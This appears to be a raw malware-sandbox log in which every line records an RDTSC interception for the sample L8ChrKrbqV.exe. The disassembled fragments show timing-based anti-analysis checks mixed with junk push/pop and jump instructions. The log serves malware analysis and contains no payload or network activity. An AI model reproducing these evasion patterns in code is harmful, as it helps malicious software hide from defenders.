Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4F3F30 second address: 4F3F36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4F3F36 second address: 4F3F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4F3F3A second address: 4F3F6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FFAEC5291B2h 0x0000000c pop edx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FFAEC5291AFh 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4F3F6C second address: 4F3F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4F3F70 second address: 4F3F74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4F424B second address: 4F429D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFAEC5267D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FFAEC5267E2h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FFAEC5267E9h 0x00000018 jmp 00007FFAEC5267E9h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 49836C second address: 498370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 498370 second address: 4983B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jnl 00007FFAEC5267D6h 0x0000000d pop ebx 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007FFAEC5267E7h 0x00000015 jnc 00007FFAEC5267D8h 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e jmp 00007FFAEC5267E4h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4F46F1 second address: 4F473D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291B8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FFAEC5291B9h 0x00000011 jmp 00007FFAEC5291ADh 0x00000016 jnl 00007FFAEC5291A6h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4F473D second address: 4F475E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFAEC5267E5h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c ja 00007FFAEC5267D6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AD89B second address: 4AD8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AD8A0 second address: 4AD8C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5267E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jng 00007FFAEC5267D6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jbe 00007FFAEC5267D6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AD9F9 second address: 4ADA14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4ADA14 second address: 4ADA30 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFAEC5267D8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FFAEC5267DAh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4ADA30 second address: 4ADA3A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAEC5291A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4ADA3A second address: 4ADA67 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFAEC5267D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push ebx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 pop ebx 0x00000014 pop eax 0x00000015 mov cx, dx 0x00000018 mov dword ptr [ebp+122D295Ah], esi 0x0000001e call 00007FFAEC5267D9h 0x00000023 pushad 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AE441 second address: 4AE445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AE445 second address: 4AE452 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AE8CB second address: 49836C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jno 00007FFAEC5291A8h 0x0000000d popad 0x0000000e nop 0x0000000f mov edi, dword ptr [ebp+122D361Eh] 0x00000015 call dword ptr [ebp+122D29CAh] 0x0000001b pushad 0x0000001c jns 00007FFAEC5291B2h 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4F89F3 second address: 4F89F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4F8CD8 second address: 4F8CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FFAEC5291A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4F8CE4 second address: 4F8CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4F8CEA second address: 4F8CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4F8CEF second address: 4F8D04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FFAEC5267D6h 0x00000009 ja 00007FFAEC5267D6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FBDFB second address: 4FBE01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FBE01 second address: 4FBE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FBE0A second address: 4FBE0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FBE0E second address: 4FBE18 instructions: 0x00000000 rdtsc 0x00000002 js 00007FFAEC5267D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE893 second address: 4FE897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE897 second address: 4FE8B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FFAEC5267ECh 0x0000000c jmp 00007FFAEC5267E0h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE8B5 second address: 4FE8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE8BC second address: 4FE8EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 jl 00007FFAEC52680Fh 0x0000000c jmp 00007FFAEC5267E9h 0x00000011 pushad 0x00000012 jno 00007FFAEC5267D6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE8EA second address: 4FE8FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAEC5291ACh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE459 second address: 4FE460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE5C6 second address: 4FE5CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 500D18 second address: 500D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 500D23 second address: 500D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 507493 second address: 507497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 507497 second address: 5074B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007FFAEC5291B1h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 5074B1 second address: 5074BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 5074BA second address: 5074BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 5074BE second address: 5074F7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FFAEC5267DCh 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 jbe 00007FFAEC5267D8h 0x00000017 push edx 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d jmp 00007FFAEC5267E5h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 5074F7 second address: 50751F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FFAEC5291A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFAEC5291B8h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 505D54 second address: 505D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 505D58 second address: 505D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 505EE4 second address: 505EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 505EE8 second address: 505F17 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFAEC5291A6h 0x00000008 jc 00007FFAEC5291A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jbe 00007FFAEC5291B7h 0x00000016 push eax 0x00000017 push edx 0x00000018 jl 00007FFAEC5291A6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 505F17 second address: 505F31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5267E6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 50607E second address: 506082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 506082 second address: 506086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 506086 second address: 506090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 506090 second address: 506096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 506096 second address: 50609A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 506351 second address: 506355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 506355 second address: 506362 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AE2AC second address: 4AE2CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5267E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4766E6 second address: 4766FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop edi 0x0000000c jl 00007FFAEC5291AEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4766FA second address: 476707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 476707 second address: 476712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 476712 second address: 476718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 50E26E second address: 50E274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 50E274 second address: 50E27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 50E27A second address: 50E27F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 50E27F second address: 50E285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 50E285 second address: 50E2AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e jmp 00007FFAEC5291B5h 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 50E2AD second address: 50E2B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 50E2B3 second address: 50E2B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 50D702 second address: 50D72A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FFAEC5267DCh 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAEC5267E6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 50D89A second address: 50D8A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007FFAEC5291A6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 50D8A8 second address: 50D8AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 50D8AC second address: 50D8B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 50DB99 second address: 50DBAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FFAEC5267DDh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 50DBAC second address: 50DBE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007FFAEC5291B5h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007FFAEC5291B6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 50DBE9 second address: 50DC08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007FFAEC5267DEh 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 jno 00007FFAEC5267D6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 50DE94 second address: 50DE98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 50DE98 second address: 50DEA5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 5162F7 second address: 516300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 516300 second address: 516306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 516306 second address: 51630A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 5144EF second address: 5144F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 5144F3 second address: 5144FD instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFAEC5291A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 5144FD second address: 514503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 514503 second address: 514520 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAEC5291B8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 51469A second address: 5146A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 514BBA second address: 514BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAEC5291B7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 514BD5 second address: 514BFB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFAEC5267E4h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jbe 00007FFAEC5267D6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 514BFB second address: 514C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FFAEC5291ACh 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 514EF3 second address: 514F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAEC5267E4h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAEC5267E3h 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 514F25 second address: 514F2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 514F2A second address: 514F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
